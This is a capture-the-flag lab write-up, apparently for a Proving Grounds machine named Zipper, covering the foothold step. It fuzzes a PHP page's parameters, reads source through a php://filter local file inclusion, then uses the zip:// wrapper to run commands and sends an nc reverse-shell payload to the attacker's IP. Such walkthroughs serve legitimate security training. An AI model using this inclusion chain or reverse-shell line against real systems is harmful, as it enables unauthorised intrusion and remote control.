> For the complete documentation index, see [llms.txt](https://offsecpg.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://offsecpg.adot8.com/proving-grounds/proving-grounds-practice/linux/zipper/foothold.md).

# Foothold

```
$ echo test > pwned.txt
```

{% hint style="info" %}
Turn on foxy proxy to capture the request
{% endhint %}

<figure><img src="/files/lNv711Gqmxp94cF8BdLE" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/piQoxe1bp0ZH4dp1BZ8R" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Definitely wasnt it lol
{% endhint %}

```
$ ffuf -u http://192.168.241.229/index.php?FUZZ=1 -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --fs 3151

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.241.229/index.php?FUZZ=1
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 3151
________________________________________________

file                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 45ms]
:: Progress: [6453/6453] :: Job [1/1] :: 813 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
```

```
GET /index.php?file=php://filter/convert.base64-encode/resource=upload
```

<figure><img src="/files/TpeAHwc1mUnLWUJYQZwB" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Lets view the source code of upload.php
{% endhint %}

```
$ vi upload.b64
                                                                                                                                                                                              
$ cat upload.b64| base64 -d > upload.php  
```

<figure><img src="/files/VoZ7Xn8dksjGn8Mqkoqs" alt=""><figcaption></figcaption></figure>

{% embed url="<https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/?source=post_page-----b49a52ed8e38-------------------------------->" %}

<figure><img src="/files/ZG9XVOc1Cp2f6JpRAOAK" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/HE9YZDTso912irc9iOGu" alt=""><figcaption></figcaption></figure>

```
uploads/upload_1725881785.zip
```

```
GET /index.php?file=zip://uploads/upload_1725881785.zip%23cmd&cmd=id
```

<figure><img src="/files/oNy2hNLQB8jpY2YgQfL0" alt=""><figcaption></figcaption></figure>

```
GET /index.php?file=zip://uploads/upload_1725881785.zip%23cmd&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+192.168.45.168+1337+>/tmp/f
```

<figure><img src="/files/PHH7H0zZRdeeuC0dUlJE" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lTSjnVEwBFzHQ2vIjTTb" alt=""><figcaption></figcaption></figure>
